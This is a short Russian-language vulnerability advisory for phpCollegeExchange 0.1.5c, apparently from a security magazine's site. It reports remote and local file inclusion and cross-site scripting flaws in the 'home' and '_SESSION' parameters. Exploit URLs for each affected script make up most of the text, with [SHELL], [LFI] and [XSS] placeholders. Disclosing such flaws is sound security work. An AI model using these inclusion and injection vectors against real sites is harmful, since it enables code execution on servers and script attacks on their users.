Хакер #305. Многошаговые SQL-инъекции
Программа: phpCollegeExchange 0.1.5c
Уязвимость позволяет удаленному пользователю осуществить XSS нападение и
выполнить произвольный PHP сценарий на целевой системе.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «home» множественными сценариями. Удаленный пользователь может
выполнить произвольный PHP сценарий на целевой системе с привилегиями Web
сервера.
Эксплоит:
[RFI]
http://localhost/path/i_head.php?home=[SHELL]
http://localhost/path/i_nav.php?home=[SHELL]
http://localhost/path/user_new_2.php?home=[SHELL]
http://localhost/path/books/allbooks.php?home=[SHELL]
http://localhost/path/books/home.php?home=[SHELL]
http://localhost/path/books/mybooks.php?home=[SHELL]
[LFI]
http://localhost/path/house/myrents.php?home=[LFI]
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «_SESSION» и «home» множественными сценариями. Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.
Эксплоит:
http://localhost/php pages/home.php?_SESSION[handle]=[XSS]
http://localhost/path/i_head.php?home=[XSS]
http://localhost/path/i_nav.php?home=[XSS]
http://localhost/path/books/allbooks.php?home=[XSS]
http://localhost/path/books/allbooks.php?_SESSION[handle]=[XSS]
http://localhost/path/books/home.php?home=[XSS]
http://localhost/path/books/home.php?_SESSION[handle]=[XSS]
http://localhost/path/books/i_nav.php?home=[XSS]